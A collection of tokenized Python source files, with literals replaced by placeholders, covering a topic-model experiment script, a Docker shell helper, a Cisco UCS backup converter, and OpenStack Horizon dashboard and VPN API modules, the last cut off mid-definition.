for n in xrange ( N ) : <EOL> for m in xrange ( M ) : <EOL> samples = np . random . choice ( pred_lls [ n , m , burnin : ] , size = ( <NUM_LIT:100> , ( T - burnin ) ) , replace = True ) <EOL> pll_samples = logsumexp ( samples , axis = <NUM_LIT:1> ) - np . log ( T - burnin ) <EOL> pred_ll_std [ n , m ] = pll_samples . std ( ) <EOL> baseline = <NUM_LIT:0> <EOL> normalizer = <NUM_LIT:0> <EOL> for Xtr , Xte in zip ( Xtrain , Xtest ) : <EOL> pi_emp = Xtr . sum ( <NUM_LIT:0> ) / float ( Xtr . sum ( ) ) <EOL> pi_emp = np . clip ( pi_emp , <NUM_LIT> , np . inf ) <EOL> pi_emp /= pi_emp . sum ( ) <EOL> baseline += Multinomial ( weights = pi_emp , K = Xtr . shape [ <NUM_LIT:1> ] ) . log_likelihood ( Xte ) . sum ( ) <EOL> normalizer += Xte . sum ( ) <EOL> from hips . plotting . layout import create_figure <EOL> fig = create_figure ( figsize = ( <NUM_LIT> , <NUM_LIT> ) , transparent = True ) <EOL> fig . set_tight_layout ( True ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> ax . spines [ '<STR_LIT>' ] . set_visible ( False ) <EOL> ax . spines [ '<STR_LIT:right>' ] . set_visible ( False ) <EOL> ax . get_xaxis ( ) . tick_bottom ( ) <EOL> ax . get_yaxis ( ) . tick_left ( ) <EOL> width = np . min ( np . diff ( Ds ) ) / ( M + <NUM_LIT:1.0> ) if len ( Ds ) > <NUM_LIT:1> else <NUM_LIT:1.> <EOL> for m in xrange ( M ) : <EOL> ax . bar ( Ds + m * width , <EOL> ( pred_ll_mean [ : , m ] - baseline ) / normalizer , <EOL> yerr = pred_ll_std [ : , m ] / normalizer , <EOL> width = <NUM_LIT> * width , color = colors [ m ] , ecolor = '<STR_LIT:k>' ) <EOL> ax . plot ( [ Ds . min ( ) - width , Ds . max ( ) + ( M + <NUM_LIT:1> ) * width ] , np . zeros ( <NUM_LIT:2> ) , '<STR_LIT>' ) <EOL> ax . set_xlim ( Ds . min ( ) - width , Ds . max ( ) + ( M + <NUM_LIT:1> ) * width ) <EOL> ax . set_xticks ( [ ] ) <EOL> ax . set_ylabel ( "<STR_LIT>" ) <EOL> ax . set_title ( "<STR_LIT>" ) <EOL> plt . savefig ( os . path . join ( results_dir , "<STR_LIT>" ) ) <EOL> def compute_singular_vectors ( model , words ) : <EOL> A , C , mu = model . A , model . C , model . emission_distn . mu <EOL> U , S , V = np . linalg . svd ( A ) <EOL> def top_k ( k , pi ) : <EOL> perm = np . argsort ( pi ) [ : : - <NUM_LIT:1> ] <EOL> return words [ perm ] [ : k ] <EOL> for d in xrange ( min ( <NUM_LIT:5> , A . shape [ <NUM_LIT:0> ] ) ) : <EOL> ud = U [ : , d ] <EOL> vd = V [ d , : ] <EOL> psi_ud = C . dot ( ud ) + mu <EOL> psi_vd = C . dot ( vd ) + mu <EOL> from pgmult . internals . utils import psi_to_pi <EOL> baseline = psi_to_pi ( mu ) <EOL> pi_ud = psi_to_pi ( psi_ud ) - baseline <EOL> pi_vd = psi_to_pi ( psi_vd ) - baseline <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , d , "<STR_LIT>" , S [ d ] ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( top_k ( <NUM_LIT:5> , pi_vd ) ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( top_k ( <NUM_LIT:5> , pi_ud ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run = <NUM_LIT:1> <EOL> results_dir = os . path . join ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" % run ) <EOL> from pgmult . internals . utils import mkdir <EOL> if not os . path . exists ( results_dir ) : <EOL> print ( "<STR_LIT>" , results_dir ) <EOL> mkdir ( results_dir ) <EOL> Xs , words = load ( ) <EOL> docs = slice ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> T_end = <NUM_LIT> <EOL> T_split = <NUM_LIT:100> <EOL> Xfilt = filter ( lambda X : X . shape [ <NUM_LIT:0> ] > T_end , Xs ) <EOL> Xtrain = [ X [ : T_end - T_split ] for X in Xfilt [ docs ] ] <EOL> Xtest = [ X [ T_end - T_split : T_end ] for X in Xfilt [ docs ] ] <EOL> N_samples = <NUM_LIT> <EOL> all_results = [ ] <EOL> Ds = np . array ( [ <NUM_LIT:10> ] ) <EOL> models = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> methods = [ fit_lds_model , fit_hmm , fit_ln_lds_model ] <EOL> for D in Ds : <EOL> D_results = [ ] <EOL> for model , method in zip ( models , methods ) : <EOL> results_file = os . path . join ( results_dir , "<STR_LIT>" % ( model , D ) ) <EOL> if os . path . exists ( results_file ) : <EOL> print ( "<STR_LIT>" , results_file ) <EOL> with gzip . open ( results_file , "<STR_LIT:r>" ) as f : <EOL> D_model_results = cPickle . load ( f ) <EOL> else : <EOL> print ( "<STR_LIT>" , model , "<STR_LIT>" , D ) <EOL> D_model_results = method ( Xtrain , Xtest , D , N_samples ) <EOL> with gzip . open ( results_file , "<STR_LIT:w>" ) as f : <EOL> print ( "<STR_LIT>" , results_file ) <EOL> cPickle . dump ( D_model_results , f , protocol = - <NUM_LIT:1> ) <EOL> D_results . append ( D_model_results ) <EOL> all_results . append ( D_results ) <EOL> for D in [ <NUM_LIT:20> , <NUM_LIT:30> , <NUM_LIT> ] : <EOL> results_file = os . path . join ( results_dir , "<STR_LIT>" % ( "<STR_LIT>" , D ) ) <EOL> print ( "<STR_LIT>" , results_file ) <EOL> with gzip . open ( results_file , "<STR_LIT:r>" ) as f : <EOL> D_model_results = cPickle . load ( f ) <EOL> all_results [ <NUM_LIT:0> ] . append ( D_model_results ) <EOL> res_index = <NUM_LIT:0> <EOL> plot_pred_log_likelihood ( all_results [ res_index ] , <EOL> models , <EOL> results_dir , <EOL> outname = "<STR_LIT>" % Ds [ res_index ] ) <EOL> plot_pred_ll_vs_D ( all_results , Ds , Xtrain , Xtest , results_dir , models ) <EOL> plt . show ( ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( np . array ( words ) [ np . where ( Xfilt [ docs ] [ <NUM_LIT:0> ] ) [ <NUM_LIT:1> ] ] ) <EOL> compute_singular_vectors ( all_results [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] . samples [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , np . array ( words ) ) </s>
<s> from crypto import SHA256d , ConvergentEncryption , encrypt_key </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals , absolute_import <EOL> from __future__ import print_function , division <EOL> from topology . platforms . shell import PExpectShell , PExpectBashShell <EOL> class DockerExecMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , container , command , * args , ** kwargs ) : <EOL> self . _container = container <EOL> self . _command = command <EOL> super ( DockerExecMixin , self ) . __init__ ( * args , ** kwargs ) <EOL> def _get_connect_command ( self ) : <EOL> return '<STR_LIT>' . format ( <EOL> self . _container , self . _command <EOL> ) <EOL> class DockerShell ( DockerExecMixin , PExpectShell ) : <EOL> """<STR_LIT>""" <EOL> class DockerBashShell ( DockerExecMixin , PExpectBashShell ) : <EOL> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> __author__ = '<STR_LIT>' </s>
<s> import logging <EOL> log = logging . getLogger ( __name__ ) <EOL> import os <EOL> import re <EOL> import xml . dom <EOL> import xml . dom . minidom <EOL> from Constants import * <EOL> from UcsHandle import _AffirmativeList <EOL> from UcsBase import * <EOL> from MoMeta import _VersionMeta , _ManagedObjectMeta <EOL> def GetElementChildNodes ( node ) : <EOL> childList = [ childNode for childNode in node . childNodes if childNode . nodeType == childNode . ELEMENT_NODE ] <EOL> return childList <EOL> def GetPropName ( prop ) : <EOL> newProp = re . sub ( '<STR_LIT>' , '<STR_LIT:_>' , re . sub ( '<STR_LIT>' , '<STR_LIT>' , re . sub ( '<STR_LIT>' , '<STR_LIT:_>' , re . sub ( '<STR_LIT>' , '<STR_LIT>' , prop ) ) ) ) . upper ( ) <EOL> return newProp <EOL> def CreatePythonPropertyMap ( propertyMap ) : <EOL> s = "<STR_LIT:{>" <EOL> for key , value in propertyMap . iteritems ( ) : <EOL> s = s + key + "<STR_LIT::>" + value + "<STR_LIT:U+002CU+0020>" <EOL> if s != "<STR_LIT:{>" : <EOL> s = s [ : - <NUM_LIT:2> ] <EOL> return ( s + "<STR_LIT:}>" ) <EOL> def MakeRn ( classNode ) : <EOL> classId = classNode . localName <EOL> propMoMeta = UcsUtils . GetUcsPropertyMeta ( UcsUtils . WordU ( classId ) , "<STR_LIT:Meta>" ) <EOL> rnPattern = propMoMeta . rn <EOL> for prop in re . findall ( "<STR_LIT>" , rnPattern ) : <EOL> prop = UcsUtils . WordL ( prop ) <EOL> if classNode . hasAttribute ( prop ) : <EOL> if ( classNode . getAttribute ( prop ) != None ) : <EOL> rnPattern = re . sub ( '<STR_LIT>' % UcsUtils . WordU ( prop ) , '<STR_LIT:%s>' % classNode . getAttribute ( prop ) , rnPattern ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % prop ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % prop ) <EOL> return rnPattern <EOL> def IsAddorSet ( classNode ) : <EOL> AddSetFlag = None <EOL> classId = classNode . localName <EOL> propMoMeta = UcsUtils . GetUcsPropertyMeta ( UcsUtils . WordU ( classId ) , "<STR_LIT:Meta>" ) <EOL> verbs = propMoMeta . verbs <EOL> if verbs : <EOL> if "<STR_LIT>" in verbs or "<STR_LIT>" in verbs : <EOL> AddSetFlag = "<STR_LIT>" <EOL> elif "<STR_LIT>" in verbs : <EOL> AddSetFlag = "<STR_LIT>" <EOL> else : <EOL> return None <EOL> else : <EOL> AddSetFlag = "<STR_LIT>" <EOL> return AddSetFlag <EOL> def FormGetCmdlet ( classNode , inMo , tagName ) : <EOL> classId = classNode . localName <EOL> propertyMap = { } <EOL> rn = MakeRn ( classNode ) <EOL> dn = None <EOL> if UcsUtils . FindClassIdInMoMetaIgnoreCase ( classId ) == None : <EOL> gmoFlag = True <EOL> print ( "<STR_LIT>" % UcsUtils . WordU ( classId ) ) <EOL> else : <EOL> gmoFlag = False <EOL> if not gmoFlag : <EOL> peerClassId = UcsUtils . WordU ( classId ) <EOL> peerClassIdStr = peerClassId + "<STR_LIT>" <EOL> dnStr = '<STR_LIT>' <EOL> else : <EOL> peerClassId = "<STR_LIT>" <EOL> peerClassIdStr = '<STR_LIT:">' + ( classId ) + '<STR_LIT:">' <EOL> for attr , val in classNode . attributes . items ( ) : <EOL> name = attr <EOL> value = '<STR_LIT:">' + val + '<STR_LIT:">' <EOL> paramNameToUse = name <EOL> if paramNameToUse is not None : <EOL> if not gmoFlag and UcsUtils . GetUcsPropertyMeta ( peerClassId , UcsUtils . WordU ( paramNameToUse ) ) is not None : <EOL> paramNameToUse = peerClassId + '<STR_LIT:.>' + GetPropName ( paramNameToUse ) <EOL> else : <EOL> paramNameToUse = '<STR_LIT:">' + paramNameToUse + '<STR_LIT:">' <EOL> propertyMap [ paramNameToUse ] = value <EOL> if classNode . parentNode . localName == "<STR_LIT>" : <EOL> if rn : <EOL> dn = rn <EOL> cmdlet = "<STR_LIT>" % ( tagName , inMo , peerClassIdStr , peerClassId , dnStr , dn ) <EOL> else : <EOL> cmdlet = "<STR_LIT>" % ( tagName , inMo , peerClassIdStr , CreatePythonPropertyMap ( propertyMap ) ) <EOL> return cmdlet <EOL> def FormAddCmdlet ( classNode , inMo , tagName ) : <EOL> classId = classNode . localName <EOL> propertyMap = { } <EOL> if UcsUtils . FindClassIdInMoMetaIgnoreCase ( classId ) == None : <EOL> gmoFlag = True <EOL> print ( "<STR_LIT>" % UcsUtils . WordU ( classId ) ) <EOL> else : <EOL> gmoFlag = False <EOL> if not gmoFlag : <EOL> peerClassId = UcsUtils . WordU ( classId ) <EOL> peerClassIdStr = peerClassId + "<STR_LIT>" <EOL> dnStr = '<STR_LIT>' <EOL> else : <EOL> peerClassId = "<STR_LIT>" <EOL> peerClassIdStr = '<STR_LIT:">' + ( classId ) + '<STR_LIT:">' <EOL> for attr , val in classNode . attributes . items ( ) : <EOL> name = attr <EOL> value = '<STR_LIT:">' + val + '<STR_LIT:">' <EOL> paramNameToUse = name <EOL> if paramNameToUse is not None : <EOL> if not gmoFlag and UcsUtils . GetUcsPropertyMeta ( peerClassId , UcsUtils . WordU ( paramNameToUse ) ) is not None : <EOL> paramNameToUse = peerClassId + '<STR_LIT:.>' + GetPropName ( paramNameToUse ) <EOL> else : <EOL> paramNameToUse = '<STR_LIT:">' + paramNameToUse + '<STR_LIT:">' <EOL> propertyMap [ paramNameToUse ] = value <EOL> cmdlet = "<STR_LIT>" % ( tagName , inMo , peerClassIdStr , CreatePythonPropertyMap ( propertyMap ) ) <EOL> return cmdlet <EOL> def GenSubCmdlet ( classNode , inMo , cmdlet , tagName ) : <EOL> if UcsUtils . IsValidClassId ( UcsUtils . WordU ( classNode . localName ) ) : <EOL> if IsAddorSet ( classNode ) == "<STR_LIT>" : <EOL> tempCmdlet = FormAddCmdlet ( classNode , inMo , tagName ) <EOL> else : <EOL> tempCmdlet = FormGetCmdlet ( classNode , inMo , tagName ) <EOL> else : <EOL> tempCmdlet = FormAddCmdlet ( classNode , inMo , tagName ) <EOL> cmdlet += tempCmdlet <EOL> inMo = tagName <EOL> childList = GetElementChildNodes ( classNode ) <EOL> callCount = <NUM_LIT:1> <EOL> moPatternToIgnore = re . compile ( r'<STR_LIT>' , re . IGNORECASE ) <EOL> for child in childList : <EOL> if moPatternToIgnore . search ( child . localName ) : <EOL> WriteUcsWarning ( '<STR_LIT>' % child . localName ) <EOL> continue <EOL> if UcsUtils . IsValidClassId ( UcsUtils . WordU ( child . localName ) ) : <EOL> if IsAddorSet ( child ) is None or IsAddorSet ( child ) == "<STR_LIT>" : <EOL> WriteUcsWarning ( '<STR_LIT>' % child . localName ) <EOL> continue <EOL> tagNameNew = tagName + "<STR_LIT:_>" + str ( callCount ) <EOL> cmdlet = GenSubCmdlet ( child , inMo , cmdlet , tagNameNew ) <EOL> callCount += <NUM_LIT:1> <EOL> return cmdlet <EOL> def GenCmdlet ( topNode ) : <EOL> moPatternToIgnore = re . compile ( r'<STR_LIT>' , re . IGNORECASE ) <EOL> if topNode . localName == "<STR_LIT>" : <EOL> cmdlet = "<STR_LIT>" <EOL> for child in GetElementChildNodes ( topNode ) : <EOL> if UcsUtils . IsValidClassId ( UcsUtils . WordU ( child . localName ) ) : <EOL> if moPatternToIgnore . search ( child . localName ) : <EOL> WriteUcsWarning ( '<STR_LIT>' % child . localName ) <EOL> continue <EOL> if IsAddorSet ( child ) is None or IsAddorSet ( child ) == "<STR_LIT>" : <EOL> WriteUcsWarning ( '<STR_LIT>' % child . localName ) <EOL> continue <EOL> subCmdlet = "<STR_LIT>" <EOL> parentGetCmd = FormGetCmdlet ( child , "<STR_LIT:None>" , "<STR_LIT>" ) <EOL> if child . hasChildNodes ( ) and len ( GetElementChildNodes ( child ) ) > <NUM_LIT:0> : <EOL> for subChild in GetElementChildNodes ( child ) : <EOL> if moPatternToIgnore . search ( subChild . localName ) : <EOL> WriteUcsWarning ( '<STR_LIT>' % subChild . localName ) <EOL> continue <EOL> if UcsUtils . IsValidClassId ( UcsUtils . WordU ( subChild . localName ) ) : <EOL> if IsAddorSet ( subChild ) is None or IsAddorSet ( subChild ) == "<STR_LIT>" : <EOL> WriteUcsWarning ( '<STR_LIT>' % subChild . localName ) <EOL> continue <EOL> subCmdlet += "<STR_LIT>" <EOL> subCmdlet += GenSubCmdlet ( subChild , "<STR_LIT>" , parentGetCmd , "<STR_LIT>" ) <EOL> subCmdlet += "<STR_LIT>" <EOL> cmdlet += subCmdlet <EOL> cmdlet += "<STR_LIT>" <EOL> return cmdlet <EOL> def ConvertFromBackup ( path , dumpToFile = False , dumpFilePath = None ) : <EOL> if not path : <EOL> WriteUcsWarning ( "<STR_LIT>" ) <EOL> return None <EOL> if not os . path . exists ( path ) : <EOL> WriteUcsWarning ( "<STR_LIT>" ) <EOL> return None <EOL> doc = xml . dom . minidom . parse ( path ) <EOL> topNode = doc . documentElement <EOL> if dumpToFile in _AffirmativeList : <EOL> if dumpFilePath : <EOL> finalOutput = GenCmdlet ( topNode ) <EOL> print "<STR_LIT>" + dumpFilePath + "<STR_LIT>" <EOL> outFile = open ( dumpFilePath , '<STR_LIT:w>' ) <EOL> outFile . write ( finalOutput ) <EOL> outFile . close ( ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> return None <EOL> else : <EOL> finalOutput = GenCmdlet ( topNode ) <EOL> print finalOutput </s>
<s> """<STR_LIT>""" <EOL> Horizon = None <EOL> try : <EOL> from horizon . base import Dashboard <EOL> from horizon . base import Horizon <EOL> from horizon . base import Panel <EOL> from horizon . base import PanelGroup <EOL> except ImportError : <EOL> import warnings <EOL> def simple_warn ( message , category , filename , lineno , file = None , line = None ) : <EOL> return '<STR_LIT>' % ( category . __name__ , message ) <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> warnings . formatwarning = simple_warn <EOL> warnings . warn ( msg , Warning ) <EOL> if Horizon : <EOL> register = Horizon . register <EOL> unregister = Horizon . unregister <EOL> get_absolute_url = Horizon . get_absolute_url <EOL> get_user_home = Horizon . get_user_home <EOL> get_dashboard = Horizon . get_dashboard <EOL> get_default_dashboard = Horizon . get_default_dashboard <EOL> get_dashboards = Horizon . get_dashboards <EOL> urls = Horizon . _lazy_urls <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] </s>
<s> from horizon . tabs . base import Tab <EOL> from horizon . tabs . base import TabGroup <EOL> from horizon . tabs . base import TableTab <EOL> from horizon . tabs . views import TabbedTableView <EOL> from horizon . tabs . views import TabView </s>
<s> import iso8601 <EOL> from django . template . defaultfilters import register <EOL> from django . template . defaultfilters import timesince <EOL> from django . utils . safestring import mark_safe <EOL> from django . utils import timezone <EOL> @ register . filter <EOL> def replace_underscores ( string ) : <EOL> return string . replace ( "<STR_LIT:_>" , "<STR_LIT:U+0020>" ) <EOL> @ register . filter <EOL> def parse_isotime ( timestr , default = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return iso8601 . parse_date ( timestr ) <EOL> except ( iso8601 . ParseError , TypeError ) : <EOL> return default or '<STR_LIT>' <EOL> @ register . filter <EOL> def timesince_sortable ( dt ) : <EOL> delta = timezone . now ( ) - dt <EOL> seconds = delta . seconds + ( delta . days * <NUM_LIT> * <NUM_LIT> ) <EOL> return mark_safe ( "<STR_LIT>" % <EOL> ( seconds , timesince ( dt ) ) ) </s>
<s> from __future__ import absolute_import <EOL> from openstack_dashboard . api import neutron <EOL> neutronclient = neutron . neutronclient <EOL> class IKEPolicy ( neutron . NeutronAPIDictWrapper ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , apiresource ) : <EOL> super ( IKEPolicy , self ) . __init__ ( apiresource ) <EOL> class IPSecPolicy ( neutron . NeutronAPIDictWrapper ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , apiresource ) : <EOL> super ( IPSecPolicy , self ) . __init__ ( apiresource ) <EOL> class IPSecSiteConnection ( neutron . NeutronAPIDictWrapper ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , apiresource ) : <EOL> super ( IPSecSiteConnection , self ) . __init__ ( apiresource ) <EOL> class AttributeDict ( dict ) : <EOL> def __getattr__ ( self , attr ) : <EOL> return self [ attr ] <EOL> def __setattr__ ( self , attr , value ) : <EOL> self [ attr ] = value <EOL> def readable ( self , request ) : <EOL> cFormatted = { '<STR_LIT:id>' : self . id , <EOL> '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT:description>' : self . description , <EOL> '<STR_LIT:status>' : self . status , <EOL> } <EOL> try : <EOL> cFormatted [ '<STR_LIT>' ] = self . ikepolicy_id <EOL> cFormatted [ '<STR_LIT>' ] = ikepolicy_get ( <EOL> request , self . ikepolicy_id ) . name <EOL> except Exception : <EOL> cFormatted [ '<STR_LIT>' ] = self . ikepolicy_id <EOL> cFormatted [ '<STR_LIT>' ] = self . ikepolicy_id <EOL> try : <EOL> cFormatted [ '<STR_LIT>' ] = self . ipsecpolicy_id <EOL> cFormatted [ '<STR_LIT>' ] = ipsecpolicy_get ( <EOL> request , self . ipsecpolicy_id ) . name <EOL> except Exception : <EOL> cFormatted [ '<STR_LIT>' ] = self . ipsecpolicy_id <EOL> cFormatted [ '<STR_LIT>' ] = self . ipsecpolicy_id <EOL> try : <EOL> cFormatted [ '<STR_LIT>' ] = self . vpnservice_id <EOL> cFormatted [ '<STR_LIT>' ] = vpnservice_get ( <EOL> request , self . vpnservice_id ) . name <EOL> except Exception : <EOL> cFormatted [ '<STR_LIT>' ] = self . vpnservice_id <EOL> cFormatted [ '<STR_LIT>' ] = self . vpnservice_id <EOL> return self . AttributeDict ( cFormatted ) <EOL> class VPNService ( neutron . NeutronAPIDictWrapper ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , apiresource ) : <EOL> super ( VPNService , self ) . __init__ ( apiresource ) <EOL> class AttributeDict ( dict ) : <EOL> def __getattr__ ( self , attr ) : <EOL> return self [ attr ] <EOL> def __setattr__ ( self , attr , value ) : <EOL> self [ attr ] = value <EOL> def readable ( self , request ) : <EOL> sFormatted = { '<STR_LIT:id>' : self . id , <EOL> '<STR_LIT:name>' : self . name , <EOL> '<STR_LIT:description>' : self . description , <EOL> '<STR_LIT>' : self . admin_state_up , <EOL> '<STR_LIT:status>' : self . status , <EOL> } <EOL> try : <EOL> sFormatted [ '<STR_LIT>' ] = self . subnet_id <EOL> sFormatted [ '<STR_LIT>' ] = neutron . subnet_get ( <EOL> request , self . subnet_id ) . cidr <EOL> except Exception : <EOL> sFormatted [ '<STR_LIT>' ] = self . subnet_id <EOL> sFormatted [ '<STR_LIT>' ] = self . subnet_id <EOL> try : <EOL> sFormatted [ '<STR_LIT>' ] = self . router_id <EOL> sFormatted [ '<STR_LIT>' ] = neutron . router_get ( <EOL> request , self . router_id ) . name <EOL> except Exception : <EOL> sFormatted [ '<STR_LIT>' ] = self . router_id <EOL> sFormatted [ '<STR_LIT>' ] = self . router_id <EOL> return self . AttributeDict ( sFormatted ) <EOL> def vpnservice_create ( request , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> body = { '<STR_LIT>' : <EOL> { '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT:name>' : kwargs [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT:description>' : kwargs [ '<STR_LIT:description>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] } <EOL> } <EOL> vpnservice = neutronclient ( request ) . create_vpnservice ( body ) . get ( <EOL> '<STR_LIT>' ) <EOL> return VPNService ( vpnservice ) <EOL> def vpnservices_get ( request , ** kwargs ) : <EOL> vpnservices = neutronclient ( request ) . list_vpnservices ( ) . get ( '<STR_LIT>' ) <EOL> return [ VPNService ( v ) for v in vpnservices ] <EOL> def vpnservice_get ( request , vpnservice_id ) : <EOL> vpnservice = neutronclient ( request ) . show_vpnservice ( vpnservice_id ) . get ( <EOL> '<STR_LIT>' ) <EOL> return VPNService ( vpnservice ) <EOL> def vpnservice_update ( request , vpnservice_id , ** kwargs ) : <EOL> vpnservice = neutronclient ( request ) . update_vpnservice ( <EOL> vpnservice_id , kwargs ) . get ( '<STR_LIT>' ) <EOL> return VPNService ( vpnservice ) <EOL> def vpnservice_delete ( request , vpnservice_id ) : <EOL> neutronclient ( request ) . delete_vpnservice ( vpnservice_id ) <EOL> def ikepolicy_create ( request , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> body = { '<STR_LIT>' : <EOL> { '<STR_LIT:name>' : kwargs [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT:description>' : kwargs [ '<STR_LIT:description>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] } <EOL> } <EOL> ikepolicy = neutronclient ( request ) . create_ikepolicy ( body ) . get ( <EOL> '<STR_LIT>' ) <EOL> return IKEPolicy ( ikepolicy ) <EOL> def ikepolicies_get ( request , ** kwargs ) : <EOL> ikepolicies = neutronclient ( request ) . list_ikepolicies ( ) . get ( '<STR_LIT>' ) <EOL> return [ IKEPolicy ( v ) for v in ikepolicies ] <EOL> def ikepolicy_get ( request , ikepolicy_id ) : <EOL> ikepolicy = neutronclient ( request ) . show_ikepolicy ( <EOL> ikepolicy_id ) . get ( '<STR_LIT>' ) <EOL> return IKEPolicy ( ikepolicy ) <EOL> def ikepolicy_update ( request , ikepolicy_id , ** kwargs ) : <EOL> ikepolicy = neutronclient ( request ) . update_ikepolicy ( <EOL> ikepolicy_id , kwargs ) . get ( '<STR_LIT>' ) <EOL> return IKEPolicy ( ikepolicy ) <EOL> def ikepolicy_delete ( request , ikepolicy_id ) : <EOL> neutronclient ( request ) . delete_ikepolicy ( ikepolicy_id ) <EOL> def ipsecpolicy_create ( request , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> body = { '<STR_LIT>' : <EOL> { '<STR_LIT:name>' : kwargs [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT:description>' : kwargs [ '<STR_LIT:description>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] } <EOL> } <EOL> ipsecpolicy = neutronclient ( request ) . create_ipsecpolicy ( body ) . get ( <EOL> '<STR_LIT>' ) <EOL> return IPSecPolicy ( ipsecpolicy ) <EOL> def ipsecpolicies_get ( request , ** kwargs ) : <EOL> ipsecpolicies = neutronclient ( request ) . list_ipsecpolicies ( ) . get ( <EOL> '<STR_LIT>' ) <EOL> return [ IPSecPolicy ( v ) for v in ipsecpolicies ] <EOL> def ipsecpolicy_get ( request , ipsecpolicy_id ) : <EOL> ipsecpolicy = neutronclient ( request ) . show_ipsecpolicy ( <EOL> ipsecpolicy_id ) . get ( '<STR_LIT>' ) <EOL> return IPSecPolicy ( ipsecpolicy ) <EOL> def ipsecpolicy_update ( request , ipsecpolicy_id , ** kwargs ) : <EOL> ipsecpolicy = neutronclient ( request ) . update_ipsecpolicy ( <EOL> ipsecpolicy_id , kwargs ) . get ( '<STR_LIT>' ) <EOL> return IPSecPolicy ( ipsecpolicy ) <EOL> def ipsecpolicy_delete ( request , ipsecpolicy_id ) : <EOL> neutronclient ( request ) . delete_ipsecpolicy ( ipsecpolicy_id ) <EOL> def ipsecsiteconnection_create ( request , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> body = { '<STR_LIT>' : <EOL> { '<STR_LIT:name>' : kwargs [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT:description>' : kwargs [ '<STR_LIT:description>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] } <EOL> } <EOL> ipsecsiteconnection = neutronclient ( request ) . create_ipsec_site_connection ( <EOL> body ) . get ( '<STR_LIT>' ) <EOL> return IPSecSiteConnection ( ipsecsiteconnection ) <EOL> def ipsecsiteconnections_get ( request , ** kwargs ) : <EOL> ipsecsiteconnections = neutronclient ( <EOL> request ) . list_ipsec_site_connections ( ) . get ( '<STR_LIT>' ) <EOL> return [ IPSecSiteConnection ( v ) for v in ipsecsiteconnections ] <EOL> def ipsecsiteconnection_get ( request , ipsecsiteconnection_id ) : <EOL> ipsecsiteconnection = neutronclient ( request ) . show_ipsec_site_connection ( <EOL> ipsecsiteconnection_id ) . get ( '<STR_LIT>' ) <EOL> return IPSecSiteConnection ( ipsecsiteconnection ) <EOL> def ipsecsiteconnection_update ( request , ipsecsiteconnection_id , ** kwargs ) : <EOL> ipsecsiteconnection = neutronclient ( request ) . update_ipsec_site_connection ( <EOL> ipsecsiteconnection_id , kwargs ) . get ( '<STR_LIT>' ) <EOL> return IPSecSiteConnection ( ipsecsiteconnection ) <EOL> def 